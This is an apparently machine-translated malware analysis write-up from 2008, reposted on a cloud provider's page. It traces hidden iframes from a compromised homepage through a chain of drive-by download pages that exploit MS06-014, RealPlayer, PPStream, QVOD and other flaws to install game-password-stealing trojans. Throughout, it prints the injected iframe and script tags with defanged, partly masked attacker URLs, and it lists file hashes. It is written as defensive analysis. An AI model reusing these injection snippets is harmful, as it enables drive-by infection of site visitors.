Trojan rootkit. win32.mnless, Trojan. win32.edog, etc.

Source: Internet
Author: User
Tags crc32

Trojan rootkit. win32.mnless, Trojan. win32.edog, etc.

EndurerOriginal
2008-02-021Version

Ie lost response after opening the website ......

Code found at the bottom of the homepage:
/---
<IFRAME src = "hxxp: // 8 ** 8.8*812 ** 15.com/88.htm" width = 0 Height = 0> </iframe>
---/

1 hxxp: // 8 ** 8.8*812 ** 15.com/88.htm
Code included:
/---
<IFRAME src = "hxxp: // 8 *** 8.8*812 *** 15.com/in.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ga **. Mm * 52 ** 08.com/20.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // D ** V.5 ** 51 * 89.net/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // A * 1 **. SB ** B2 * 2.com/a.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // s * f *. 07 ** 08 * 08.net/sf.htm" width = 0 Height = 0> </iframe>
---/

1.1 hxxp: // 8 ** 8.8*812 ** 15.com/in.htm
Code included:
/---
<IFRAME src = "hxxp: // y ** UN. y ** un8 ** 78.com/web/6620.38.htm" width = 100 Height = 0> </iframe>
---/

1.1.1 hxxp: // y ** UN. y ** un8 ** 78.com/web/6620.38.htm
Code included:
/---
<IFRAME srcw.htm.html width = 100 Height = 0> </iframe>
---/

1.1.1.1 hxxp: // y ** UN. y ** un8 ** 78.com/web/htm.htmloutput code:
/---
<SCRIPT src = hxxp: // y ** UN. y ** un8 ** 78.com/web/1.js> </SCRIPT>
<SCRIPT src = hxxp: // y ** UN. y ** un8 ** 78.com/web/bf.js> </SCRIPT>
<SCRIPT src = hxxp: // y ** UN. y ** un8 ** 78.com/web/pps.js> </SCRIPT>
<IFRAME width = '10' Height = '10' src = 'hxxp: // y ** UN. y ** un8 ** 78.com/web/3.htm'> </iframe>
<SCRIPT src = hxxp: // y ** UN. y ** un8 ** 78.com/web/pps.js> </SCRIPT>
<IFRAME width = '000000' Height = '0' src = 'hxxp: // y ** UN. y ** un8 ** 78.com/web/2.htm'> </iframe>
<IFRAME width = 100 Height = 0 src = hxxp: // y ** UN. y ** un8 ** 78.com/web/0.htm> </iframe>
---/

1.1.1.1.1 hxxp: // y ** UN. y ** un8 ** 78.com/web/1.js
Download hxxp: // y ** UN. y ** un8 ** 78.com/14.exe with a severe vulnerability in MS06-014: msadco. dll

File Description: D:/test/14.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 17:15:21
Size: 9728 bytes, 9.512 KB
MD5: b64fac1da0efbbc479486fefa269cf39
Sha1: 35e62825704027baa6dc0d7089857d10986fbd71
CRC32: 8e086454

Kaspersky: Trojan-PSW.Win32.OnLineGames.pik, rising Report: Trojan. DL. win32.undef. W

1.1.1.1.2 hxxp: // y ** UN. y ** un8 ** 78.com/web/bf.js

Download hxxp: // y ** UN. y ** un8 ** 78.com/bf.exe with the storm video Vulnerability

File Description: D:/test/bf.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:15:57
Modification time: 17:15:57
Access time: 17:16:24
Size: 23886 bytes, 23.334 KB
MD5: a20a230c7e2e1f93bc659aa9fa1ed3d1
Sha1: 8fe260c3a6a971d339b2ea170283c13f4faade87
CRC32: 13eb41fd

Kaspersky: Trojan-PSW.Win32.OnLineGames.ode, rising Report: Trojan. DL. win32.undef. W, rootkit. win32.mnless. GP

1.1.1.1.3 hxxp: // y ** UN. y ** un8 ** 78.com/web/pps.js
Use the PPStream vulnerability to download hxxp: // y ** UN. y ** un8 ** 78.com/pps.exe

Pps.exe is the same as bf.exe.

1.1.1.1.4 use baidubar. tool to download hxxp: // y ** UN. y ** un8 ** 78.com/ad.cab
Ad.cabpackage containing bd.exe
Bd.exe is the same as bf.exe.

1.1.1.1.5 hxxp: // y ** UN. y ** un8 ** 78.com/web/3.htm
Download hxxp: // y ** UN. y ** un8 ** 78.com/g.exe using the glchat. ocx Vulnerability in the Internet world
G.exe is the same as bf.exe.

1.1.1.1.6 hxxp: // y ** UN. y ** un8 ** 78.com/web/2.htm
RealPlayer vulnerability exploitation code. One of the codes is: payload + = "yuange ";

1.1.1.1.7 hxxp: // y ** UN. y ** un8 ** 78.com/web/0.htm
Use the qvod player vulnerability to download hxxp: // y ** UN. y ** un8 ** 78.com/me.exe
Me.exe is the same as bf.exe.

1.2 hxxp: // ga **. Mm * 52 ** 08.com/20.htm

Code included:
/---
<IFRAME src = "hxxp: // 3 ** 75 * 86.com/uu/web.htm" width = 100 Height = 0> </iframe>
---/

1.2.1 hxxp: // 3 *** 75 * 86.com/uu/web.htm

Code included:
/---
<IFRAME srcw.r.htm width = 10 Height = 0> </iframe>
<IFRAME src?index.htm width = 10 Height = 0> </iframe>
---/

1.2.1.1 hxxp: // 3 ** 75 * 86.com/uu/r.htm
RealPlayer vulnerability exploitation code. One of the codes is: xcbfcxn + = "Lizhen ";

1.2.1.2 hxxp: // 3 ** 75 * 86.com/uu/index.htm
Output code:
/---
<IFRAME src000006014.html> </iframe>
<SCRIPT src#bf.gif> </SCRIPT>
<SCRIPT src?pps.gif> </SCRIPT>
<SCRIPT srcw.lz.gif> </SCRIPT>
---/

1.2.1.2.1 hxxp: // 3 *** 75 * 86.com/uu/06014.html
Download hxxp: // 3 ** 75 * 86.com/uu/uuu.exe with a severe vulnerability in MS06-014: msadco. dll and save it as quit.exe

File Description: D:/test/uuu.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:27:20
Modification time: 17:27:20
Access time: 17:27:30
Size: 19476 bytes, 19.20 KB
MD5: 9eaf1e6e1986170ffdcfae05852f5d0e
Sha1: 4b55206aab215f1e09e9442988da5b7c61716fa9
CRC32: 3177b317

1.2.1.2.2 hxxp: // 3 ** 75 * 86.com/uu/bf.gif
Download hxxp: // 3 ** 75 * 86.com/uu/uuu.exe using the storm audio and video Vulnerability

1.2.1.2.3 hxxp: // 3 ** 75 * 86.com/uu/lz.gif
Download hxxp: // 3 ** 75 * 86.com/uu/uuu.exe using the glchat. ocx Vulnerability in the Internet world

1.2.1.2.4 hxxp: // 3 *** 75 * 86.com/uu/pps.gif
Use the PPStream vulnerability to download hxxp: // 3 ** 75 * 86.com/uuu/uuu.exe

1.3 hxxp: // D ** V.5 ** 51 * 89.net/

Code included:
/---
<IFRAME src = "hxxp: // PPP. Bu * ya ** oni **. com/ww/new82.htm" width = 1 Height = 1> </iframe>
---/

1.3.1 hxxp: // PPP. Bu * ya ** oni **. com/ww/new82.htm
Code included:
/---
<IFRAME src = hxxp: // PPP. Bu * ya ** oni **. com/dm/diao.htm width = 1 Height = 1> </iframe>
<IFRAME src = hxxp: // PPP. Bu * ya ** oni **. com/dm/rl.htm width = 1 Height = 1> </iframe>
<IFRAME src = hxxp: // PPP. Bu * ya ** oni **. com/dm/rr.htm width = 1 Height = 1> </iframe>
---/

1.3.1.1 hxxp: // PPP. Bu * ya ** oni **. com/dm/diao.htm
Output code:
/---
<SCRIPT src = hxxp: // PPP. Bu * ya ** oni **. com/dm/11.js> </SCRIPT>
<SCRIPT src = hxxp: // PPP. Bu * ya ** oni **. com/dm/BB. js> </SCRIPT>
<SCRIPT src = hxxp: // PPP. Bu * ya ** oni **. com/dm/pp. js> </SCRIPT>
<SCRIPT src = hxxp: // PPP. Bu * ya ** oni **. com/dm/pp. js> </SCRIPT>
---/

1.3.1.1.1 hxxp: // PPP. Bu * ya ** oni **. com/dm/11.js
Download hxxp: // dd.749571.com/bb/014.exewith a severe vulnerability in MS06-014: msadco. dll, save as ntuser.com

File Description: D:/test/014.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 12272 bytes, 11.1008 KB
MD5: f12f5cb120648999c40ef8a617efd8da
Sha1: 881d4cf70f5a9a77df37438c826e00fc3fc619d6
CRC32: f6a07465

Kaspersky: Trojan-Downloader.Win32.Agent.ine, rising: Trojan. DL. win32.mnless. XR

1.3.1.1.2 hxxp: // PPP. Bu * ya ** oni **. com/dm/BB. js
Download hxxp: // dd.749571.com/bb/bb.exe
Bb.exe is the same as 014.exe.

1.3.1.1.3 hxxp: // PPP. Bu * ya ** oni **. com/dm/pp. js
Use the PPStream vulnerability to download hxxp: // dd.749571.com/bb/pp.exe
Pp.exe is the same as 014.exe.

1.3.1.1.4 use baidubar. tool to download hxxp: // dd.749571.com/bb/bd.cab
Include File: bd.exe
Bd.exe is the same as 014.exe.

1.3.1.2 hxxp: // PPP. Bu * ya ** oni **. com/dm/rl.htm
RealPlayer vulnerability exploitation code. One of the codes is: xcbfcxn + = "Lizhen ";

1.3.1.3 hxxp: // PPP. Bu * ya ** oni **. com/dm/rr.htm
Download hxxp: // is.749571.com/bb/a.exe using the glchat. ocx Vulnerability in the Internet world.
A.exe cannot be downloaded.

1.4 hxxp: // A * 1 **. SB ** B2 * 2.com/a.htm
Code included:
/---
<IFRAME src = "hxxp: // XXX. j ** SP ** p * P. US/dgll1.htm? Id = TT "width = 100 Height = 0> </iframe>
---/

1.4.1 hxxp: // XXX. j ** SP ** p * P. US/dgll1.htm? Id = TT
Output code:
/---
<IFRAME width = 100 Height = 1 frameborder = 0 scrolling = No src = "Ceshi/real.htm"> </iframe>
<IFRAME width = 100 Height = 1 frameborder = 0 scrolling = No src = "Ceshi/lz.htm"> </iframe>
<IFRAME width = 100 Height = 1 frameborder = 0 scrolling = No src = "Ceshi/614.htm"> </iframe>
---/

1.4.1.1 hxxp: // XXX. j ** SP ** p * P. US/Ceshi/real.htm
RealPlayer vulnerability exploitation code. One of the codes is: xcbfcxn + = "Lizhen ";

1.4.1.2 hxxp: // XXX. j ** SP ** p * P. US/Ceshi/lz.htm
Download hxxp: // XXX. j ** SP ** p * P. US/ww/dod.exe using US-ASCII code and the world glchat. ocx Vulnerability

File Description: D:/test/dod.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:39:25
Modification time: 17:39:25
Access time: 17:39:38
Size: 12248 bytes, 11.984 KB
MD5: d7da77be93072171fa1e6778655e37da
Sha1: 74ea3b71ab6953a231e914b3592ded61de4c198b
CRC32: ca260cda

Kaspersky: Trojan-Downloader.Win32.Agent.iga, rising: Trojan. DL. win32.mnless. XR

1.4.1.3 hxxp: // XXX. j ** SP ** p * P. US/Ceshi/614.htm
Download hxxp: // XXX. j ** SP ** P. US/ww/dod.exe with MS06-014: msadco. dll severe vulnerability

1.5 hxxp: // s * f *. 07 ** 08 * 08.net/sf.htm
Code included:
/---
<IFRAME src = "hxxp: // XXX. A ** OMI * Ba **. com/index888.htm? F8? 001 "width = 0 Height = 0> </iframe>
---/

1.5.1 hxxp: // XXX. A ** OMI * Ba **. com/index888.htm? F8? 001
Output the following code:
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/ajax.gif> </SCRIPT>
<IFRAME width = '0' Height = '0' src = 'hxxp: // XXX. A ** OMI * Ba **. com/ms06014.htm'> </iframe>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/real. js> </SCRIPT>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/bfyy.gif> </SCRIPT>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/pps.gif> </SCRIPT>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/xunlei.gif> </SCRIPT>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/lz.gif> </SCRIPT>
<IFRAME width = '0' Height = '0' src = 'hxxp: // XXX. A ** OMI * Ba **. com/qvod.html '> </iframe>
---/

1.5.1.1 hxxp: // XXX. A ** OMI * Ba **. com/ajax.gif
Download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe with MS06-014: msadco. dll critical vulnerability

File Description: D:/test/xxx.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:43:58
Modification time: 17:43:59
Access time:
Size: 12288 bytes, 12.0 KB
MD5: ebea634c297a18c2ff5dbc72841e178a
Sha1: cc2a9a901dc5b2f3e513e2370d008defb00f094a
CRC32: 252b48da

Kaspersky: Trojan-PSW.Win32.OnLineGames.qgh, rising: Trojan. win32.edog. j

1.5.1.2 hxxp: // XXX. A ** OMI * Ba **. com/ms06014.htm
Download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe with MS06-014: msadco. dll critical vulnerability

1.5.1.3 hxxp: // XXX. A ** OMI * Ba **. com/real. js
Use the RealPlayer vulnerability to download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe

1.5.1.4 hxxp: // XXX. A ** OMI * Ba **. com/bfyy.gif
Download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe

1.5.1.5 hxxp: // XXX. A ** OMI * Ba **. com/pps.gif
Use the PPStream vulnerability to download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe

1.5.1.6 hxxp: // XXX. A ** OMI * Ba **. com/xunlei.gif
Use the thunder vulnerability to download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe

1.5.1.7 hxxp: // XXX. A ** OMI * Ba **. com/lz.gif
Download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe using the glchat. ocx Vulnerability in the Internet world.

1.5.1.8 hxxp: // XXX. A ** OMI * Ba **. com/qvod.html
Use the qvod player vulnerability to download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.